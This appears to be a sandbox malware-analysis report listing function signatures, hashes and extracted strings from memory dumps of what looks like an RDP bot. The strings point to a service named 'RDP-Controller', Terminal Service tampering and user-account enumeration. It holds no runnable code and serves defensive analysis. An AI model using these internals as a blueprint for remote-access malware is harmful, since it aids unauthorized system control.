                  • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
                  • API String ID: 1412730629-3633878399
                  • Opcode ID: 281e6b280061e0635a5243834af1028dd6d232271e6f00ea43ae733916f1591a
                  • Instruction ID: a6be6d44f69f868ddb7340421f4c4fd992c299d07847dbc7cb40b45825094bf5
                  • Opcode Fuzzy Hash: 281e6b280061e0635a5243834af1028dd6d232271e6f00ea43ae733916f1591a
                  • Instruction Fuzzy Hash: 49512860F0E743A2FB305B14A4843B82663AF05765F240B37D5FE462F2DF6DA9899342
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484854998.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true
                  • Associated: 00000015.00000002.2484834641.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484885042.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484904334.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484920861.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484937141.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484954358.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11ec0000_main.jbxd
                  Similarity
                  • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
                  • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
                  • API String ID: 1412730629-3633878399
                  • Opcode ID: b1516949392ace607f764f33e21896c41fbae2f7928558f7730e3b32c198888b
                  • Instruction ID: 0bdd7213c04c2e366bc2c6ecec3166beb4ce1e9f6dbce65780c48a8babfacf06
                  • Opcode Fuzzy Hash: b1516949392ace607f764f33e21896c41fbae2f7928558f7730e3b32c198888b
                  • Instruction Fuzzy Hash: 7C513860A0CF4382FB7057D6ECC83BA26699F05375FA017B2C56E462F1DE6DBE858241
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: Heap$strncpy$Process_errno$AllocFreefflushfopenfseekfwrite
                  • String ID: (path != NULL)$5$H:/Projects/rdp/bot/codebase/ini.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(path=%s)$ini_load$mem_alloc$service
                  • API String ID: 1423203057-595982613
                  • Opcode ID: 35eb32acd43654b99719608bc2c1593f5e5cb6d4644c090a06c464b2fce54b4c
                  • Instruction ID: a59fc90ec702b97cb650e279421f96dc2e176d9b13ebc10ab119f372bbb4e35b
                  • Opcode Fuzzy Hash: 35eb32acd43654b99719608bc2c1593f5e5cb6d4644c090a06c464b2fce54b4c
                  • Instruction Fuzzy Hash: 1DA1B462A0D782C5FA21AB05A440379EB61EF51BC4FE440B9DA4DC7695EFBCE585C320
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: OpenQueryValuefflushfwrite
                  • String ID: (key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                  • API String ID: 1980715187-2022313065
                  • Opcode ID: 7fcae333c55fb0ccb99e8ffe0183cfd2a21e9584ea582d874418c060f7b8e282
                  • Instruction ID: 1299f517e3ac1093dfda70ad05214c915db98c6a2da67739a8fdf1d5a8e68924
                  • Opcode Fuzzy Hash: 7fcae333c55fb0ccb99e8ffe0183cfd2a21e9584ea582d874418c060f7b8e282
                  • Instruction Fuzzy Hash: BDA15120D0C70BD6F621B740A84077AE254AF017C4FF481BADD1ECA691EEADAD85D732
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true
                  • Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd
                  Similarity
                  • API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
                  • String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
                  • API String ID: 2122475568-588975189
                  • Opcode ID: 9d059f1f5dd7415c002bfc40bca07d3c4d82ce6738f01354cf924633f6badd35
                  • Instruction ID: bd35fc5699bf01aebff2e05e333e1ada86f5d2a7daa10b81e3bdcda18423152c
                  • Opcode Fuzzy Hash: 9d059f1f5dd7415c002bfc40bca07d3c4d82ce6738f01354cf924633f6badd35
                  • Instruction Fuzzy Hash: 65513AB6A08A4686EB50CF29E44436977A1FB88B88F504137DADE43769DF3CE949C740
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true
                  • Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd
                  Similarity
                  • API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
                  • String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
                  • API String ID: 2122475568-588975189
                  • Opcode ID: 1eedadad500edf32e04d263bd9f55e9cc564723da34f8de4d54f81d13fbb1ac2
                  • Instruction ID: 6c88bdfdf5b02dce101cf4c0776355e528af4b8f3ef55cb3f77c4fa0a1c99956
                  • Opcode Fuzzy Hash: 1eedadad500edf32e04d263bd9f55e9cc564723da34f8de4d54f81d13fbb1ac2
                  • Instruction Fuzzy Hash: F2513BB6A08B4686EB50CF29E44436977A1FB88B84F504137DADD43769DF3CE949C740
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true
                  • Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd
                  Similarity
                  • API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
                  • String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
                  • API String ID: 2122475568-588975189
                  • Opcode ID: dcc62bcad00684de019104841a8f931329f32da96cad2cceaff96aeb97c58103
                  • Instruction ID: b7a7b5279b0cc6e4a0512f896bf786eb8abf507c7f25631b013896d5e4daffaa
                  • Opcode Fuzzy Hash: dcc62bcad00684de019104841a8f931329f32da96cad2cceaff96aeb97c58103
                  • Instruction Fuzzy Hash: 05513BB6A08A4686EB50CF29E44436977A1FB88B84F504137DADD43769DF3CE949C740
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true
                  • Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd
                  Similarity
                  • API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
                  • String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
                  • API String ID: 2122475568-588975189
                  • Opcode ID: c284144d680ec4523087ec0b6fb13f06a2fc4852147986030773929b24b80cc0
                  • Instruction ID: 78228c381e1b49e26cec74d7172dc70ef9668cb83fc3ac541a6a45e76ca4a212
                  • Opcode Fuzzy Hash: c284144d680ec4523087ec0b6fb13f06a2fc4852147986030773929b24b80cc0
                  • Instruction Fuzzy Hash: 74513AB6A08B4686EB50CF29E44436977A1FB88B88F504137DADE43769DF3CE949C740
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                  • Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd
                  Similarity
                  • API ID: ErrorLast$CountCriticalInitializeManagerOpenSectionSpinfflushfwrite
                  • String ID: $Done$P$ServicesActive$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_scm) failed(gle=%lu)$[E] (%s) -> OpenSCManagerA(SERVICES_ACTIVE_DATABASE) failed(gle=%lu)$[I] (%s) -> %s$scm_init$~
                  • API String ID: 546114577-3142219161
                  • Opcode ID: dc7b3edb1b96fafe6ace2f878cfc270cb54aaa187ae3b6ec2148f67baf07579a
                  • Instruction ID: 513430eb6ac1e6cff6ac8cc234575a1c6ce3b14a7c1b0d75befee7327d633898
                  • Opcode Fuzzy Hash: dc7b3edb1b96fafe6ace2f878cfc270cb54aaa187ae3b6ec2148f67baf07579a
                  • Instruction Fuzzy Hash: 6B41F791F0C72792FB309F14E8C03B822A4DF05348F605033CAEE862B1AE5DB9A59F45
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: EnvironmentErrorExpandLastStringsfflushfwrite
                  • String ID: ((*xpath_sz) > 0)$(path != NULL)$(xpath != NULL)$(xpath_sz != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu)$[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu)$fs_path_expand
                  • API String ID: 1721699506-2273971785
                  • Opcode ID: 6c4ab4fc53780e0b150f997a2720910844ef62c52006fc2f546de1764606101c
                  • Instruction ID: acb5807dfe5760bd7dc8ffda71e333ce613b054810645eb0166736fccf53e0c4
                  • Opcode Fuzzy Hash: 6c4ab4fc53780e0b150f997a2720910844ef62c52006fc2f546de1764606101c
                  • Instruction Fuzzy Hash: CD617D61E0C747D9FA21BB14E8803B89252AFA1788FF445BAD95DC7194EE3CED468720
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                  • Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd
                  Similarity
                  • API ID: strlen$CompareFileTime
                  • String ID: %ProgramFiles%\RDP\$TermService$termsrv3$termsrv3$v32.ini$v32.ini
                  • API String ID: 342285119-844192579
                  • Opcode ID: 30368236fa65dfd26f33114051efb4c57a2f7cefb1022de13b1530c22006544d
                  • Instruction ID: aa831c8a0f45772ed7ff321e86cebc49aeb8f68307bdae3b20cff4b5e4256a1c
                  • Opcode Fuzzy Hash: 30368236fa65dfd26f33114051efb4c57a2f7cefb1022de13b1530c22006544d
                  • Instruction Fuzzy Hash: 5051B1A1B0C78341FB31AE65A8507BA5791DF867C4F480031DACE4B7AAEE7CE9458F00
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: CtrlErrorHandlerLastRegisterServicefflushfwrite
                  • String ID: $P$RDP-Controller$Service running$Service stopping$[E] (%s) -> RegisterServiceCtrlHandler failed(GetLastError=%lu)$[I] (%s) -> %s$svc_main$~
                  • API String ID: 3562457520-1478336053
                  • Opcode ID: 52f60b2fdd6b7a4117ffb17ff41153f903985ef64f4eb76314e0509221f3b0aa
                  • Instruction ID: a0f275d757cbb48f508f98da0c585b21caafb13514197bf5b88eb882d4fa64aa
                  • Opcode Fuzzy Hash: 52f60b2fdd6b7a4117ffb17ff41153f903985ef64f4eb76314e0509221f3b0aa
                  • Instruction Fuzzy Hash: B4510250F0CB03C6FB69776594903B9F1949F14394FB0C0BAC50ECAAD2DE6DA8869372
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true
                  • Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd
                  Similarity
                  • API ID: Heap$Process$AllocFreestrcpystrlen
                  • String ID: -LTCMAS-$-LTCSES-$XESS$[D] (%s) -> Logoff(name=%s,s_sid=%s,acct_expires=%x,ts_now=%llx)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$on_tick_expiry$t:
                  • API String ID: 925994320-4234522349
                  • Opcode ID: 711575fe787fea8fe66afaf681d5257aa99ee325125eba93f4346aa83786c236
                  • Instruction ID: 45bbc7bd6f863d5935f3cfa0eb40394e9e50792d438222bb1db7b9f00b197065
                  • Opcode Fuzzy Hash: 711575fe787fea8fe66afaf681d5257aa99ee325125eba93f4346aa83786c236
                  • Instruction Fuzzy Hash: 8D418CA1A09A4786FA40AB55E84037927B1BF88B94F55403AEEDE073B7DE7CE945C340
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: strlen
                  • String ID: ((*path_sz) > 0)$(path != NULL)$(path_sz != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,path_sz=%llu)$fs_path_temp
                  • API String ID: 39653677-3852240402
                  • Opcode ID: b4405722874e1bf75b2a03881d607c8f25b0d38e7ca5b041789b72432e3fb928
                  • Instruction ID: bc7236d92e6dcb20663d776c0655216174ab47a1bb8c101345228b41c466f2eb
                  • Opcode Fuzzy Hash: b4405722874e1bf75b2a03881d607c8f25b0d38e7ca5b041789b72432e3fb928
                  • Instruction Fuzzy Hash: E1415161A0CB43D5FB12BF14A5503B8E351BFA47C8FF441BAD55E87295EE3CA9068720
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                  • Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd
                  Similarity
                  • API ID: strcmp
                  • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var$main$version
                  • API String ID: 1004003707-2349658452
                  • Opcode ID: b94ec3f647cc81143d64c06ba5fad273c4cfac334e6d0cb33bac54ba1e8291a1
                  • Instruction ID: 06b77c3c7681eb53dae9f8ed27ca40066037d47036496841c89b796c070d4e09
                  • Opcode Fuzzy Hash: b94ec3f647cc81143d64c06ba5fad273c4cfac334e6d0cb33bac54ba1e8291a1
                  • Instruction Fuzzy Hash: FE4128A2A09747D6FA399F44E8407F42360FF84348F548536EAED461B5DF7CA589CB00
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true
                  • Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd
                  Similarity
                  • API ID: strcmp
                  • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var$main$version
                  • API String ID: 1004003707-2349658452
                  • Opcode ID: c069338d6658000d34e45bacf4bdf0188d8b796733ade8e0209c51278b0bb835
                  • Instruction ID: bbcab5e9244ed78a17956093324efe887db5af59465590b7a66326604333b6dc
                  • Opcode Fuzzy Hash: c069338d6658000d34e45bacf4bdf0188d8b796733ade8e0209c51278b0bb835
                  • Instruction Fuzzy Hash: 1D412BF1B09647A6FA108B65E9407F4A360BF44B88F454537EACD461B6EF3CE649C340
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484854998.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true
                  • Associated: 00000015.00000002.2484834641.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484885042.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484904334.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484920861.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484937141.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484954358.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11ec0000_main.jbxd
                  Similarity
                  • API ID: strcmp
                  • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var$main$version
                  • API String ID: 1004003707-2349658452
                  • Opcode ID: f597a8786ee0ffa638b97d4ecf7a4a4c5361fe08dde7f2cc3011cb9a405a1a5e
                  • Instruction ID: df071a31d06c58a80b13eb41462c257e8012f068f64313ff1c8e3770369d0ed4
                  • Opcode Fuzzy Hash: f597a8786ee0ffa638b97d4ecf7a4a4c5361fe08dde7f2cc3011cb9a405a1a5e
                  • Instruction Fuzzy Hash: E6412A61A08E4792FF118F92EE007F66268BF14378F8455B2EA4D461B5DF7CBA96C300
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true
                  • Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd
                  Similarity
                  • API ID: strcmp
                  • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec$main$version
                  • API String ID: 1004003707-693788558
                  • Opcode ID: fb04181c019cd70a356c0aab54568f0bef338efa7b670cf42f1ecf4a169d6d5e
                  • Instruction ID: 964e6340aafc2f67cf2cbb4e23e8c9e7bf39a4d522465e298b29b8f5faf1e9a5
